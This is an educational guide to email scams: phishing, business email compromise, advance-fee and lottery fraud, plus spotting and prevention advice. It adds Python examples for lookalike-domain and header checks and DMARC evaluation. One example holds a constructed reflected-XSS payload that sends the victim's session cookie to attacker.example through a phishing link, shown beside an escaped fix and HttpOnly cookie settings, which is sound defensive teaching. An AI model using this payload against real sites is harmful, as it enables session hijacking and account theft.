Email Scams


A guide to popular scams and how to stay protected


Email is one of the most widely used means of communication, which also makes it one of the most exploited tools in the hands of cybercriminals. Email scams have become one of the most common ways to defraud individuals and organizations, using carefully targeted messages.

The goal of an email scam is to trick the recipient into handing over personal or financial information, such as bank account or credit card details, or into sending money directly. The cybercriminals then use what they obtain to drain accounts and, in extreme cases, to damage reputations.

Email scams can be categorized into various forms.


Types of Email Scams

Phishing: The most common type. The scammer sends an email that appears to come from a legitimate source, such as a bank or a government agency, but is actually fraudulent. The email typically contains a link to a fake website that imitates the real one and is hosted on a lookalike domain: one that differs from the genuine domain by a detail that is easy to miss, such as a substituted character (a digit one in place of a lowercase L, for instance) or two adjacent letters transposed. The recipient is asked to enter their credentials or financial details, which the attackers then use for fraud.

Business email compromise (BEC)/CEO fraud: This scam keeps evolving and has cost businesses millions of dollars. Someone posing as your CEO or another senior leader asks your finance or accounts team to make a money transfer. Using details harvested from social networks, the scammer registers a lookalike of your email domain and sets up an account carrying the CEO's real name and photo, then addresses specific people in your accounts or finance teams (staff names and roles are just as easy to find on social networks). Alternatively, the scammer takes over the CEO's real mailbox through phishing or another compromise, in which case the message comes from the genuine address. The emails are urgent in tone and timed for when the CEO or senior leadership is travelling or in meetings, a fact gleaned from the executive's social accounts. The end goal is to have your team wire money to an account that belongs to the scammer and has nothing to do with your business or its clients.

Nigerian scam: Also known as the "419 scam" (after the section of the Nigerian criminal code that covers fraud), this is an advance-fee fraud. The email claims to come from a wealthy individual or official who needs help moving a large sum of money out of their country and promises the recipient a generous share in return. The recipient is asked for their bank account details and, typically, for a series of "processing" fees before the (non-existent) money can be released. Once the scammer has the account details or the fees, they disappear.

Lottery and Prize scams: These are too good to be true, yet people still fall for them, which keeps them among the most common scams. The scammer claims that the recipient has won a large prize or lottery and asks for their social security number, bank account or credit card details so the winnings can be "transferred". Once the recipient provides this information, the scammer uses it to empty their account.


Examples of Email Scams

Cybercriminals use several strategies to scam people. Here is how a common credential-phishing scam plays out:

Step 1: An email spoofing a reputable domain (or sent from a lookalike of it) is mass-distributed.

Step 2: The email creates urgency: it claims that the user's password is about to expire and gives instructions to reset or renew it within 24 hours.

Step 3: If the user falls for it and clicks the link, one of two things generally happens. In the first, the user lands on a bogus page that looks exactly like the real password reset page and asks for both the current and the new password. Once the user submits them, the scammers use the current password to log in to the user's email or bank account. If the victim's account belongs to an enterprise, the attacker can reuse that credential against webmail, VPN and other resources on the enterprise network.

In the second, the link points at the real password reset page, but its URL carries a crafted parameter that the page reflects into its HTML without escaping. The browser executes the attacker's script in the context of the legitimate site (a reflected cross-site scripting, XSS, attack), and the script sends the user's session cookie, or whatever else the page can reach, to the attacker. With that session the attacker acts as the logged-in user on the email or bank account or the enterprise portal without ever learning the password. Marking the session cookie HttpOnly stops the script from reading document.cookie, although it does not stop the script from making requests that ride on the user's session.
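The second variant, as an added example that is not part of the original page: the phishing link targets the genuine reset page and the only hostile part is the query parameter. The vulnerable renderer reflects it verbatim, the hardened one escapes it, and the cookie helper shows the HttpOnly attribute that keeps the session out of reach of any script that does run. The host names, the `user` parameter name and the payload are assumptions constructed for the example.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload: the script an attacker would smuggle into the link.  It ships
# document.cookie to a host the attacker controls (attacker.example is a placeholder).
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"

# The phishing link points at the *real* reset page; only the query parameter is hostile.
# The parameter name "user" and the host are assumptions for this example.
PHISHING_LINK = "https://accounts.example.com/reset?user=" + quote(PAYLOAD)


def render_reset_page_vulnerable(username: str) -> str:
    """Reflects the parameter straight into the HTML, so the browser runs whatever it contains."""
    return f"<h1>Reset password for {username}</h1><form method='post'>...</form>"


def render_reset_page_hardened(username: str) -> str:
    """Same page, but the value is HTML-escaped before it is placed in the document."""
    return f"<h1>Reset password for {html.escape(username, quote=True)}</h1><form method='post'>...</form>"


def handle_reset_link(url: str, render) -> str:
    """Simulates the server: pull ?user= out of the clicked link and render the page with it."""
    params = parse_qs(urlsplit(url).query)
    username = params.get("user", [""])[0]
    return render(username)


def session_cookie_header(session_id: str, http_only: bool = True) -> str:
    """Builds the Set-Cookie line for the session.  HttpOnly hides the cookie from
    document.cookie, so even a successful reflection cannot read it."""
    attrs = [f"session={session_id}", "Path=/", "Secure", "SameSite=Lax"]
    if http_only:
        attrs.append("HttpOnly")
    return "Set-Cookie: " + "; ".join(attrs)


def script_is_live(page: str) -> bool:
    """True when the attacker's script tag survives verbatim in the rendered page."""
    return "<script>" in page


if __name__ == "__main__":
    for name, render in (("vulnerable", render_reset_page_vulnerable),
                         ("hardened", render_reset_page_hardened)):
        page = handle_reset_link(PHISHING_LINK, render)
        print(f"{name:10s} script executes: {script_is_live(page)}")
    print(session_cookie_header("c0ffee"))
```

Escaping on output is the fix for the reflection itself; HttpOnly, Secure and SameSite on the cookie limit what a script can do if some other reflection is missed. Neither replaces the other.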


How to Spot Email Scams

Vigilance is key to spotting email scams. Here are some ways you can identify a scam:

  • Check the sender's actual email address, not just the display name, and don't click any links or reply if the address is unfamiliar or does not match the organisation's real domain
  • Look for spelling and grammatical errors in the message text
  • Examine the sender's domain and any linked website's domain for spoofing tricks: substituted or transposed characters, or the real domain name used as a prefix of an unrelated one
  • Check whether the Reply-To address points somewhere other than the sender's domain
  • Be extra cautious before giving out personal details on any web page or in reply to any email
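The lookalike-domain checks described under Phishing and BEC above, and the sender checks in this list, as an added example that is not part of the original page: it parses the From and Reply-To headers, folds common homoglyphs, tests the sender domain against the organisation's real domains for one-character edits, transpositions and prefix tricks, and flags an executive's display name on a domain that is not trusted. The trusted domains, executive names, confusable table and sample messages are all constructed assumptions for the example.

```python
import email
import email.utils

# Assumptions for this example: the organisation's genuine domains and the display
# names that warrant extra scrutiny (the executives a BEC lure would impersonate).
TRUSTED_DOMAINS = {"example.com"}
EXECUTIVE_NAMES = {"jane doe"}

# Character sequences commonly substituted for lookalikes (homoglyphs).  Partial list;
# a production filter would use the Unicode confusables table.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("|", "l"),
               ("\u0430", "a"), ("\u0435", "e"), ("\u043e", "o"), ("\u0440", "p"), ("\u0441", "c")]


def fold_confusables(s: str) -> str:
    """Map lookalike characters onto the ASCII letters they imitate."""
    for src, dst in CONFUSABLES:
        s = s.replace(src, dst)
    return s


def within_one_edit(a: str, b: str) -> bool:
    """True if one insertion, deletion, substitution or adjacent transposition turns a into b."""
    if a == b:
        return True
    if abs(len(a) - len(b)) > 1:
        return False
    i = 0
    while i < min(len(a), len(b)) and a[i] == b[i]:
        i += 1
    if len(a) == len(b):
        if a[i + 1:] == b[i + 1:]:                    # substitution
            return True
        return (i + 1 < len(a) and a[i] == b[i + 1]   # transposition
                and a[i + 1] == b[i] and a[i + 2:] == b[i + 2:])
    if len(a) > len(b):
        return a[i + 1:] == b[i:]                     # deletion
    return a[i:] == b[i + 1:]                         # insertion


def classify_domain(domain: str, trusted_domains=TRUSTED_DOMAINS):
    """Return ('trusted' | 'lookalike' | 'external', imitated_domain_or_None)."""
    domain = domain.lower()
    for trusted in trusted_domains:
        if domain == trusted or domain.endswith("." + trusted):
            return "trusted", trusted
    folded = fold_confusables(domain)
    for trusted in trusted_domains:
        t = fold_confusables(trusted)
        if (folded == t or within_one_edit(folded, t)
                or folded.startswith(t + ".")          # example.com.reset-portal.net
                or t.replace(".", "-") in folded):     # example-com.net
            return "lookalike", trusted
    return "external", None


def analyse_headers(msg) -> list:
    """msg: anything with .get(header), such as email.message.Message.  Returns findings."""
    findings = []
    from_name, from_addr = email.utils.parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    kind, imitated = classify_domain(from_domain)
    if kind == "lookalike":
        findings.append(f"sender domain {from_domain!r} looks like {imitated!r}")
    if from_name.strip().lower() in EXECUTIVE_NAMES and kind != "trusted":
        findings.append(f"display name {from_name!r} matches an executive but the domain is {kind}")
    reply_to = msg.get("Reply-To")
    if reply_to:
        rt_domain = email.utils.parseaddr(reply_to)[1].rpartition("@")[2].lower()
        if rt_domain and rt_domain != from_domain:
            findings.append(f"Reply-To domain {rt_domain!r} differs from From domain {from_domain!r}")
    return findings


# Constructed sample messages (not real mail).
SAMPLES = {
    "bec_lookalike": "From: Jane Doe <jane.doe@examp1e.com>\nSubject: Urgent wire before 5pm\n\nPlease pay the attached invoice today.\n",
    "bec_replyto": "From: Jane Doe <jane.doe@example.com>\nReply-To: jane.doe.ceo@gmail.com\nSubject: Quick favour\n\nAre you at your desk?\n",
    "legit": "From: IT Helpdesk <helpdesk@mail.example.com>\nSubject: Planned maintenance\n\nMail will be unavailable on Sunday.\n",
}


def scan_samples() -> dict:
    """Run the header checks over every constructed sample."""
    return {name: analyse_headers(email.message_from_string(raw)) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(name, "->", findings or ["no findings"])
```

The second sample shows why a trusted From domain is not enough on its own: a compromised or spoofed internal address with a Reply-To at a free webmail provider is a classic BEC pattern, and the reply is what the scammer is after.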

Ways to Prevent and Avoid Email Scams

There are several ways to prevent and avoid email scams. Here are a few:

  • Deploy an email security gateway that detects malicious attachments, unsafe URLs and social-engineering content. Given today's targeted attacks, it should be able to tune protection to each user's exposure, attack history and access privileges
  • Publish email domain authentication records (SPF, DKIM and DMARC with an enforcing policy) so that receiving systems reject mail that spoofs your trusted domain
  • Prevent email account compromise by scanning internal email as well as inbound mail and by enforcing multifactor authentication (MFA)
  • Train your employees on current phishing tactics and send regular reminders to stay alert, for example to check whether the Reply-To address matches the sender's domain
  • Keep operating systems, email clients and browsers patched on every employee device, and run antivirus and antimalware software
  • Back up data frequently so that you can recover if you do fall victim, and test the restore process
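What the DMARC item above actually buys you, as an added example that is not part of the original page or of any product: a small evaluator that parses a DMARC record, applies the RFC 7489 alignment rules to a message's SPF and DKIM results, and returns the disposition, plus a linter for the settings that leave a domain spoofable. The two records and the domains are constructed; the organizational-domain function approximates the Public Suffix List with "last two labels", which is an assumption that is wrong for suffixes such as co.uk.

```python
# Constructed records: the weak, monitor-only one and the enforcing one.
WEAK_RECORD = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
STRICT_RECORD = ("v=DMARC1; p=reject; adkim=s; aspf=s; "
                 "rua=mailto:dmarc@example.com; ruf=mailto:dmarc@example.com")


def parse_dmarc(txt: str) -> dict:
    """Parse the tag=value list of a DMARC TXT record, applying the RFC 7489 defaults."""
    tags = {}
    for part in txt.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    if "p" not in tags:
        raise ValueError("DMARC record without a p= policy")
    tags.setdefault("adkim", "r")   # relaxed DKIM alignment by default
    tags.setdefault("aspf", "r")    # relaxed SPF alignment by default
    tags.setdefault("pct", "100")
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain, approximated as the last two labels.  Real receivers use the
    Public Suffix List; this shortcut is an assumption that is wrong for e.g. co.uk."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(from_domain: str, auth_domain, mode: str) -> bool:
    """Does the authenticated domain align with the RFC5322.From domain?"""
    if not auth_domain:
        return False
    if mode == "s":                                   # strict: exact match
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)   # relaxed


def dmarc_disposition(record: str, from_domain: str, spf_pass_domain=None, dkim_pass_domain=None):
    """Evaluate one message.  spf_pass_domain: domain that passed SPF (MAIL FROM), or None;
    dkim_pass_domain: d= of a DKIM signature that verified, or None.  Returns (result, action)."""
    tags = parse_dmarc(record)
    if aligned(from_domain, spf_pass_domain, tags["aspf"]) or aligned(from_domain, dkim_pass_domain, tags["adkim"]):
        return "pass", "deliver"
    return "fail", {"none": "deliver", "quarantine": "quarantine", "reject": "reject"}[tags["p"]]


def dmarc_weaknesses(record: str) -> list:
    """Lint a record for settings that leave the domain spoofable."""
    tags = parse_dmarc(record)
    issues = []
    if tags["p"] == "none":
        issues.append("p=none: spoofed mail is only reported, never blocked")
    if int(tags["pct"]) < 100:
        issues.append(f"pct={tags['pct']}: policy applied to only part of the failing mail")
    if "rua" not in tags:
        issues.append("no rua=: no aggregate reports, so you never see who is spoofing the domain")
    if tags["p"] != "none" and tags.get("sp", tags["p"]) == "none":
        issues.append("sp=none: subdomains can still be spoofed")
    return issues


if __name__ == "__main__":
    # A BEC lure: From: ceo@example.com, sent from the attacker's own mail server, so SPF passes
    # for the attacker's envelope domain but nothing aligns with example.com.
    for label, rec in (("weak", WEAK_RECORD), ("strict", STRICT_RECORD)):
        print(label, dmarc_disposition(rec, "example.com", spf_pass_domain="attacker.example"),
              dmarc_weaknesses(rec))
```

Start with p=none to collect aggregate reports and find every legitimate sender, then move to quarantine and finally reject. Note the limit: DMARC covers your exact domain and its subdomains only. A lookalike such as examp1e.com is someone else's domain with its own (or no) policy, so the sender-domain checks under "How to Spot Email Scams" are still needed.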